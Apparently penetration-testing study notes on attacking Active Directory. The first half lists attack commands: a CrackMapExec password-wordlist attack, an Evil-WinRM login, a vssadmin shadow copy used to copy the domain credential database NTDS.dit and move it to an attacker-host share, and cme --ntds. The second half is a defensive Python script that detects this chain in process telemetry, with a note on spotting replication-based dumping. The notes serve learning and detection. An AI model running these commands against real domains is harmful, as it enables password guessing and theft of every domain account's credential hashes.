Attacking Active Directory & NTDS.dit
Dictionary Attacks against AD accounts using CrackMapExec
Creating a Custom list of Usernames
Username Anarchy
# Installation - <https://github.com/urbanadventurer/username-anarchy>
# Usage: names.txt contains the real names (first/last) gathered during information gathering; the tool generates candidate username formats from them
./username-anarchy -i names.txt
Launching the Attack with CrackMapExec
# Dictionary attack (wordlist) against a known valid username
crackmapexec smb ip -u bwilliamson -p /usr/share/wordlists/fasttrack.txt
Capturing NTDS.dit
# Connecting to a DC with Evil-WinRM using a valid username/password
evil-winrm -i ip -u eren -p pass
# Checking Local Group Membership
net localgroup
# Checking User Account Privileges including Domain
net user eren
# Creating Shadow Copy of C:
vssadmin CREATE SHADOW /For=C:
# Copying NTDS.dit out of the shadow copy (the HarddiskVolumeShadowCopyN device name is printed by vssadmin when the shadow is created)
cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit
# Transferring NTDS.dit to the attack host (CompData is a share served there by impacket's smbserver.py)
cmd.exe /c move C:\NTDS\NTDS.dit \\attackerip\CompData
Using cme to Capture NTDS.dit
crackmapexec smb ip -u eren -p pass --ntds
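The manual shadow-copy chain above leaves a clear trail in process-creation telemetry (Sysmon event 1 or Security 4688 with command-line logging): a vssadmin shadow creation, a read of NTDS.dit from a HarddiskVolumeShadowCopy device path, and a copy or move of NTDS.dit to a UNC share. The following is an added example for these notes, not code from CrackMapExec or Evil-WinRM: it correlates those three stages per host over constructed sample records. Host names, timestamps and the correlation window are assumptions.

```python
"""Correlate the shadow-copy route to NTDS.dit in process-creation telemetry.

Added example for these notes, not code from CrackMapExec or Evil-WinRM. Records
carry the command-line field of Sysmon event 1 / Security 4688; hosts, times
and the correlation window are assumptions, the sample records are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# The three observable stages of the manual chain. Any read of NTDS.dit from a
# shadow-copy device path is suspicious on its own; the other two stages raise
# confidence when they bracket it on the same host.
STAGE_PATTERNS = {
    "shadow_create": re.compile(r"vssadmin(\.exe)?\s+create\s+shadow", re.I),
    "ntds_from_shadow": re.compile(r"HarddiskVolumeShadowCopy\d+\\.*\\ntds\.dit", re.I),
    "ntds_to_unc": re.compile(r"(copy|move)\s+\S*ntds\.dit\s+\\\\[^\\\s]+\\", re.I),
}
STAGE_ORDER = ["shadow_create", "ntds_from_shadow", "ntds_to_unc"]


def make_sample_process_events():
    """Constructed records replaying the chain on DC01, plus benign vssadmin use on FS01."""
    base = datetime(2024, 5, 1, 11, 0, 0)
    return [
        {"host": "DC01", "time": base, "Image": r"C:\Windows\System32\vssadmin.exe",
         "CommandLine": "vssadmin CREATE SHADOW /For=C:"},
        {"host": "DC01", "time": base + timedelta(seconds=40), "Image": r"C:\Windows\System32\cmd.exe",
         "CommandLine": r"cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit"},
        {"host": "DC01", "time": base + timedelta(seconds=90), "Image": r"C:\Windows\System32\cmd.exe",
         "CommandLine": r"cmd.exe /c move C:\NTDS\NTDS.dit \\10.10.14.5\CompData"},
        {"host": "FS01", "time": base + timedelta(minutes=2), "Image": r"C:\Windows\System32\vssadmin.exe",
         "CommandLine": "vssadmin list shadows"},   # routine admin check, must not alert
    ]


def make_lone_shadow_read_sample():
    """Constructed record: NTDS.dit read from an existing shadow, no vssadmin, no exfil seen."""
    return [{"host": "DC02", "time": datetime(2024, 5, 2, 9, 0, 0), "Image": r"C:\Windows\System32\cmd.exe",
             "CommandLine": r"copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\Temp\n.dit"}]


def detect_ntds_extraction(events, window=timedelta(minutes=30)):
    """Per host, emit one alert for each NTDS.dit read from a shadow-copy path.

    Severity is 'high' when a shadow creation precedes it or a copy/move of
    NTDS.dit to a UNC path follows it within `window`, else 'medium'.
    """
    by_host = defaultdict(list)
    for e in events:
        by_host[e["host"]].append(e)

    alerts = []
    for host, evs in by_host.items():
        evs.sort(key=lambda e: e["time"])
        tagged = [(e, {n for n, rx in STAGE_PATTERNS.items() if rx.search(e["CommandLine"])})
                  for e in evs]
        for e, tags in tagged:
            if "ntds_from_shadow" not in tags:
                continue
            stages = {"ntds_from_shadow"}
            for other, otags in tagged:
                delta = other["time"] - e["time"]
                if "shadow_create" in otags and -window <= delta <= timedelta(0):
                    stages.add("shadow_create")
                if "ntds_to_unc" in otags and timedelta(0) <= delta <= window:
                    stages.add("ntds_to_unc")
            ordered = [s for s in STAGE_ORDER if s in stages]
            alerts.append({"host": host, "time": e["time"],
                           "severity": "high" if len(ordered) > 1 else "medium",
                           "stages": ordered, "command": e["CommandLine"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_ntds_extraction(make_sample_process_events() + make_lone_shadow_read_sample()):
        print(alert)
```

This correlation covers the manual route only. CrackMapExec's --ntds pulls the secrets over the directory replication service by default rather than reading the file from a shadow, so that route is watched separately: with directory-service object access auditing enabled it appears as Security event 4662 granting the DS-Replication-Get-Changes-All right to an account that is not a domain controller.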